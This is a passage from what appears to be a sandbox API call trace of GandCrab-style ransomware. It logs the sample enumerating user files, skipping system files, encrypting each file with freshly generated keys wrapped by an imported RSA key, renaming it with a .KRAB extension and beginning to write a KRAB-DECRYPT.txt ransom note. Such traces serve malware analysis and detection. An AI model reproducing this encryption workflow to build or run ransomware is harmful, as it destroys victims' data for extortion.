pbBuffer=0x338ef4c) returned 1 [0085.211] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0085.212] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.212] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0085.215] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.216] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.216] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.216] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.216] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.216] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.216] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010820) returned 1 [0085.218] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10234f8) returned 1 [0085.218] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.218] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.218] GetLastError () returned 0x0 [0085.218] CryptDestroyKey (hKey=0x10234f8) returned 1 [0085.218] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0085.218] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010820) returned 1 [0085.220] CryptImportKey (in: hProv=0x1010820, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0085.220] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.220] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.220] GetLastError () returned 0x0 [0085.220] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.220] CryptReleaseContext (hProv=0x1010820, dwFlags=0x0) returned 1 [0085.220] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\q3csbyrsxfl l.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.221] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.221] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.221] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x42f9, lpOverlapped=0x0) returned 1 [0085.239] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffbd07, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.239] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x42f9, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x42f9, lpOverlapped=0x0) returned 1 [0085.239] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.239] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.244] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.244] CloseHandle (hObject=0x3a8) returned 1 [0085.244] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.245] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\q3csbyrsxfl l.bmp"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Q3cSByRSxfl L.bmp.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\q3csbyrsxfl l.bmp.krab")) returned 1 [0085.246] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.247] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.247] lstrcmpW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2=".") returned 1 [0085.247] lstrcmpW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="..") returned 1 [0085.247] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="QZHjTN3bPCwqybadX3MG.pdf" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf" [0085.247] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.247] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf.KRAB") returned 67 [0085.247] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf") returned 62 [0085.247] lstrlenW (lpString=".pdf") returned 4 [0085.247] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.248] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pdf ") returned 5 [0085.248] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.249] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf") returned 62 [0085.249] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf") returned 62 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="desktop.ini") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="autorun.inf") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="ntuser.dat") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="iconcache.db") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="bootsect.bak") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="boot.ini") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="ntuser.dat.log") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="thumbs.db") returned -1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="KRAB-DECRYPT.html") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="ntldr") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="NTDETECT.COM") returned 1 [0085.249] lstrcmpiW (lpString1="QZHjTN3bPCwqybadX3MG.pdf", lpString2="Bootfont.bin") returned 1 [0085.249] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.250] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011458) returned 1 [0085.251] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.252] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.252] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.252] CryptGenRandom (in: hProv=0x1011458, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.252] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0085.252] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.253] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011898) returned 1 [0085.254] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.255] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.255] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.255] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.255] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.255] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.255] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011678) returned 1 [0085.257] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10230f8) returned 1 [0085.257] CryptGetKeyParam (in: hKey=0x10230f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.257] CryptEncrypt (in: hKey=0x10230f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.258] GetLastError () returned 0x0 [0085.258] CryptDestroyKey (hKey=0x10230f8) returned 1 [0085.258] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0085.258] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10113d0) returned 1 [0085.259] CryptImportKey (in: hProv=0x10113d0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10234f8) returned 1 [0085.260] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.260] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.260] GetLastError () returned 0x0 [0085.260] CryptDestroyKey (hKey=0x10234f8) returned 1 [0085.260] CryptReleaseContext (hProv=0x10113d0, dwFlags=0x0) returned 1 [0085.260] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\qzhjtn3bpcwqybadx3mg.pdf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.261] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.261] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.261] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0xa041, lpOverlapped=0x0) returned 1 [0085.277] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffff5fbf, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.277] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xa041, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0xa041, lpOverlapped=0x0) returned 1 [0085.277] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.277] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.281] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.282] CloseHandle (hObject=0x3a8) returned 1 [0085.282] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.282] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\qzhjtn3bpcwqybadx3mg.pdf"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\QZHjTN3bPCwqybadX3MG.pdf.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\qzhjtn3bpcwqybadx3mg.pdf.krab")) returned 1 [0085.283] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.283] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.283] lstrcmpW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2=".") returned 1 [0085.283] lstrcmpW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="..") returned 1 [0085.283] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="R6GaB5zYymqWU7YglxE.csv" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv" [0085.283] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.284] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv.KRAB") returned 66 [0085.284] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv") returned 61 [0085.284] lstrlenW (lpString=".csv") returned 4 [0085.284] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.284] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".csv ") returned 5 [0085.284] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv") returned 61 [0085.285] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv") returned 61 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="desktop.ini") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="autorun.inf") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="ntuser.dat") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="iconcache.db") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="bootsect.bak") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="boot.ini") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="ntuser.dat.log") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="thumbs.db") returned -1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="KRAB-DECRYPT.html") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="KRAB-DECRYPT.txt") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="CRAB-DECRYPT.txt") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="ntldr") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="NTDETECT.COM") returned 1 [0085.285] lstrcmpiW (lpString1="R6GaB5zYymqWU7YglxE.csv", lpString2="Bootfont.bin") returned 1 [0085.285] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0085.286] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011700) returned 1 [0085.287] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.288] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.288] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.288] CryptGenRandom (in: hProv=0x1011700, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0085.288] CryptReleaseContext (hProv=0x1011700, dwFlags=0x0) returned 1 [0085.288] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.289] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010b50) returned 1 [0085.291] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0085.291] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0085.291] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0085.291] CryptGenRandom (in: hProv=0x1010b50, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0085.291] CryptReleaseContext (hProv=0x1010b50, dwFlags=0x0) returned 1 [0085.291] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.292] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0085.293] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x1022ff8) returned 1 [0085.293] CryptGetKeyParam (in: hKey=0x1022ff8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.293] CryptEncrypt (in: hKey=0x1022ff8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.294] GetLastError () returned 0x0 [0085.294] CryptDestroyKey (hKey=0x1022ff8) returned 1 [0085.294] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0085.294] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10112c0) returned 1 [0085.295] CryptImportKey (in: hProv=0x10112c0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0x10234f8) returned 1 [0085.295] CryptGetKeyParam (in: hKey=0x10234f8, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0085.295] CryptEncrypt (in: hKey=0x10234f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0085.296] GetLastError () returned 0x0 [0085.296] CryptDestroyKey (hKey=0x10234f8) returned 1 [0085.296] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0085.296] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\r6gab5zyymqwu7yglxe.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0085.296] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0085.297] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0085.297] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x113b1, lpOverlapped=0x0) returned 1 [0085.312] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffeec4f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0085.312] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x113b1, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x113b1, lpOverlapped=0x0) returned 1 [0085.312] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0085.312] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.316] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.317] CloseHandle (hObject=0x3a8) returned 1 [0085.317] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.317] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\r6gab5zyymqwu7yglxe.csv"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\R6GaB5zYymqWU7YglxE.csv.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\r6gab5zyymqwu7yglxe.csv.krab")) returned 1 [0085.318] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.318] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0085.318] lstrcmpW (lpString1="Skype", lpString2=".") returned 1 [0085.318] lstrcmpW (lpString1="Skype", lpString2="..") returned 1 [0085.318] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\", lpString2="Skype" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype" [0085.318] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\" [0085.318] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x2f30000 [0085.319] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0085.319] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=43, fCreate=0 | out: pszPath="C:\\Program Files (x86)\\Common Files") returned 1 [0085.319] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=36, fCreate=0 | out: pszPath="C:\\Windows") returned 1 [0085.319] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x2f30000, csidl=28, fCreate=0 | out: pszPath="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local") returned 1 [0085.319] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0085.319] VirtualAlloc (lpAddress=0x0, dwSize=0x400, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0085.320] wsprintfW (in: param_1=0x2f30200, param_2="%s\\KRAB-DECRYPT.txt" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\\\KRAB-DECRYPT.txt") returned 61 [0085.320] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Skype\\\\KRAB-DECRYPT.txt" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\skype\\krab-decrypt.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) 